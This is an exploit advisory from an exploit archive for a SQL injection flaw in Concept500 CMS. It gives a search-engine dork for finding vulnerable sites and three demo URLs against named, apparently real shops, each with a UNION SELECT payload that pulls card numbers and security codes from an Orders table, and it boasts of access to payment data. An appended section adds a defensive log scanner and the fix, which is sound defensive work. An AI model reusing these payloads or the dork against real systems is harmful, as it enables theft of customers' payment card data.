Concept500 CMS SQL Injection

2011.08.10
Credit: Anonymous
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Concept500 CMS SQL Injection Vulnerability
# Google Dork: [inurl : inurl:viewItem.php?id= ]
# Date: 2011-07-08
# Author: Sepehr Security Team
# Discovered By: H3X
# Software Site: http://www.concept500.co.uk/

~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+

[Expl0it :]
http://www.[sitename].com/viewitem.php?id=[SQL Injection]

[DEMO:]
1) http://www.mycommissionbid.com/bid/viewitem.php?id=-487+union+select+1,group_concat%28SecurityNo,0x3a,CardNo%29,3,4,5,6,7,8,9,10,11+from+Orders--
2) http://www.historicflyingclothing.com/viewitem.php?id=-10055+union+select+1,group_concat%28CardNo,0x3a,SecurityNo%29,3,4,5+from+Orders--
3) http://www.hiscoll.com/viewitem.php?id=-10055+union+select+1,group_concat%28CardNo,0x3a,SecurityNo%29,3,4,5+from+Orders--
and more ...

[Note :]
With this vulnerability you can get direct access to payment information, such as PayPal and other card information, in the database.

~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+

[Spc. Thanks :]
thE_Knight | Einstein | W!z4rd | Naboodgar | CONS7ANTINE | Mr.Amir-Masoud | nImaarek | GrEEn-ErRor | Net.Plus | Cruel
All Sepehr Security Team Members And All Iranian Hack3rs

[Home Page :]
wWw.Sepehr-Team.orG
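A defender-side check for the request pattern in this advisory, as an added example that is not part of the original advisory or of Concept500's code: it scans web-server access log lines for `viewitem.php` requests whose `id` parameter is not a plain integer. The combined log format, the sample log lines, the addresses and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Allowlist: a legitimate item id is a short, plain non-negative integer.
VALID_ID_RE = re.compile(r'\d{1,10}')
# Used only to label a finding; the allowlist above is what decides.
UNION_RE = re.compile(r'union\s+(?:all\s+)?select', re.IGNORECASE)

def classify(line):
    """Return None for benign or unrelated lines, else a finding label."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    # The advisory shows both viewItem.php and viewitem.php, so ignore case.
    if not url.path.lower().endswith('/viewitem.php'):
        return None
    # parse_qs decodes %xx and turns '+' into a space, as PHP does for $_GET.
    for value in parse_qs(url.query, keep_blank_values=True).get('id', []):
        if VALID_ID_RE.fullmatch(value):
            continue
        return 'union-select' if UNION_RE.search(value) else 'non-numeric-id'
    return None

def scan(lines):
    """Return (line_number, label) for every flagged line, 1-indexed."""
    findings = []
    for number, line in enumerate(lines, start=1):
        label = classify(line)
        if label:
            findings.append((number, label))
    return findings

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Aug/2011:10:00:01 +0000] "GET /viewitem.php?id=10055 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Aug/2011:10:00:05 +0000] "GET /bid/viewItem.php?id=-487+union+select+1,group_concat%28CardNo%29,3+from+Orders-- HTTP/1.1" 200 812',
    '203.0.113.9 - - [10/Aug/2011:10:00:09 +0000] "GET /viewitem.php?id=10055%27 HTTP/1.1" 500 0',
    '198.51.100.4 - - [10/Aug/2011:10:00:12 +0000] "GET /index.php?page=2 HTTP/1.1" 200 100',
]

if __name__ == '__main__':
    for number, label in scan(SAMPLE_LOG):
        print(f'line {number}: {label}')
```

The same integer allowlist, applied in the application before the value reaches the query and combined with a parameterized statement, is the fix for the CWE-89 flaw the advisory reports.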



Copyright 2024, cxsecurity.com

 
